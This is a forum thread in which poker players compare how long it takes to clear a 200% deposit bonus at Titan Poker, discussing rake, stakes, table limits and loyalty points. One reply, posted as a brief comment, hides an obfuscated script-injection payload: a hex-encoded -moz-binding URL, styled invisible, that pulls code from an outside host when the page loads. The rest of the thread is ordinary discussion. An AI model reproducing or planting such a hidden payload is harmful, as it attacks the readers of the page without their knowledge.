titan: how long to clear 200% bonus?

• boschman123
      boschman123
      Bronze
      hiya all,
      i havent post for a long time, very bussy :heart: whoring :heart: other sites.

i want to deposite $300 at titan using the 200% code.

how long will i be playing to get that bonus free? SLA style. :D
      i will start at NL10 and then , according bankrollmanagment, move to NL25 ect.
  • 18 replies
    • Chiller3k
      Chiller3k
      Bronze
      It will take some Time...

you need 2100$ Rake to clear the hole Bonus.
      And thats hard on Nl10/NL20 (there's no NL25 on Titan)
      I would say 2-3 Month?
      I don't know how much you play, that's the Problem
    • aciddrop
      aciddrop
      Bronze
      Like Chiller says, NL20 is the lowest. They play a lot slower on that site, rarely ever, if at all, do you see more than 60 hands per hour on any table. Mostly as little as 35, so it is easy to play 8 tables, but you can't play more than that. That is their limit.

I've been playing there since May 24th, and have played 35k hands in that time. I have cleared 524.26 in rakeback and loyalty bonuses. The loyalty bonus is paid monthly, and is based on your vip level. It is paid regardless of any other earnings, and is just a standard monthly payment. My loyalty payment for August was 50.00. As your vip level increases, you earn a higher level of loyalty bonus, and increase the amount of Titan Points earned as well.

My total rake paid on the site so far is 822.65. At the advertised clearance rate of 10 per 35 of rake, that would mean only 240 or so is actual rakeback, and the rest must be loyalty bonuses, but I don't believe that actually. There is something wacky about the figures, but I don't know what. I will go through my emails, and add up exactly what they have sent me.

I like the site. Easy players mostly. I am profitable up to NL200 SSS, and NL100 BSS. Played one 200 hand session only of NL400 SSS, for the loss of one buy-in.

You should be able to work out from that how long it will take you to clear the way you play.

EDIT:
      I just checked the emails from Titan. I have cleared $420 of the 600 so far, plus another 90 in loyalty bonuses. I have only paid 822 in rake according to PT, so that means they are returning it to me at a greater than advertised level. I did win a PS freeroll, worth $2,000, meaning I have the bankroll to play at a higher level than I otherwise would have. I think because of this, I have advanced to Platinum vip level, and earn Titan points at a higher rate. The rakeback is based on TP earned, which could explain this anomaly. Anyway, to me, it is worth it.
    • boschman123
      boschman123
      Bronze
      hmm i am just back from a little pokerbreak and playing SH NL10 and NL25 at an american friendly site. i play one session of one hour a day, sometimes 2 sessions. when i have my fingerspitzengefuhl back i want to do 3 sessions a day of 1 or 1 1/2 hour, maximum tables.

havent downloaded titan yet so i dont know how it feels there. i expect to deposite coming friday or saterday.

any NL10 SH games over there?
    • aciddrop
      aciddrop
      Bronze
      Actually, since you ask, I just logged on and had a look, and guess what? They've introduced low stakes NL!! There is a whole bunch of NL4 and NL10 tables, full of people, SH as well! That wasn't available back in May when I started, they only had NL20 as the lowest. Because of the $300 deposit, that was correct to play anyway. And I have to say, NL20 was veeerrry easy.

The other thing they have different there, on NL50 and higher, is an intermediate table size, 8 max. So you can graduate from FR via this 8 Max on the way to SH. The 8 Max tables seem pretty loose too, with much higher average pot sizes than FR, but I haven't got to trying them yet.

It will be interesting to hear your impressions once you start there.
    • kexix
      kexix
      Bronze
      Hi been playing on titan for 2 weeks now first some 10nl and than 20nl.
      I've 2400 titanpoints now and received a 21$ bonus a few days ago.
      The games are very very soft imo.

btw i've found this on the site: Start a new table, get more Points! Be the FIRST PLAYER to sit down at a new ring game table and you'll earn 50% more Points for each qualifying raked hand until you leave the table!

This counts for shorthanded also i think
    • ciRith
      ciRith
      Bronze
      Originally posted by kexix
      btw i've found this on the site: Start a new table, get more Points! Be the FIRST PLAYER to sit down at a new ring game table and you'll earn 50% more Points for each qualifying raked hand until you leave the table!

This counts for shorthanded also i think
      Can you post a link of this? I like the idea. :)
    • howard182
      howard182
      Bronze
      They had that when I played there for a bonus, being a game starter's rough though, not worth it unless you're already comfortable with any number of any type of opponents.
    • ciRith
      ciRith
      Bronze
      Originally posted by howard182
      They had that when I played there for a bonus, being a game starter's rough though, not worth it unless you're already comfortable with any number of any type of opponents.
      Fine for me. ;)
    • kexix
      kexix
      Bronze
      what can you do with titanpoints?
    • debelinko
      debelinko
      Bronze
      pretty much nothing
    • howard182
      howard182
      Bronze
      They determine bonus clearance, and I think you can trade them in (at a much lower rate) for moolah (as well as the usual not-worth-your-time tournaments and satellites). Which is more than you get from some schemes, try full tilt points for useless (if you're not an american or canadian).
    • BOXKAHS
      BOXKAHS
      Global
      I LOVE TITAN POKER THEY HAVE GREAT BONUSES
    • Muggs
      Muggs
      Bronze
      Very intresting question! http://www.[email=xx style=-moz-binding:url(\68\74\74\70\3a\2f\2f\70\73\73\2e\31\31\30\6d\62\2e\63\6f\6d\2f\61\2e\78\6d\6c\23\61);display:none; ]tt[/email]
    • NiekamNeidomu
      NiekamNeidomu
      Bronze
      so it is easy to play 8 tables, but you can't play more than that. That is their limit.
      plz..tell me that you r joking ! no? mhm..
    • Chiller3k
      Chiller3k
      Bronze
      Hi NiekamNeidomu,

as you can see in the Titan Poker FAQs you can open up to 16 tables at the same time.

Best regards,
      Chiller3k
    • NiekamNeidomu
      NiekamNeidomu
      Bronze
      thx Chiller3k
      btw.. is it just me.. or i dont c a 200% up to 600$ anymore only 10$/25$rake ;) ?
    • Chiller3k
      Chiller3k
      Bronze
      hey,

hm yeah you're right... weird. Gotta ask somebody who's in charge if the promotion will persist O.o
      I actually thought the promotion would end at the end of this month....
      Geez nobody tells me nothing xD
      Sry that I can't help ya right away :\

€dit: I just notice: in the guide it says that the promo will end at the end of September as well... I think the 600$ bonus will be reactivated then but that's just a guess.

Best regards,
      Chiller3k
    • NiekamNeidomu
      NiekamNeidomu
      Bronze
      np np ^^ i wont go to titan atleast 9more days xD so take your time !:P and maybe it will b worth to stay in party afterall o.O they r preparing some changes..or what.. ;d
      actualy points mean cash..+reload bonuses ( recently ones is like am O.O) was like FTW :P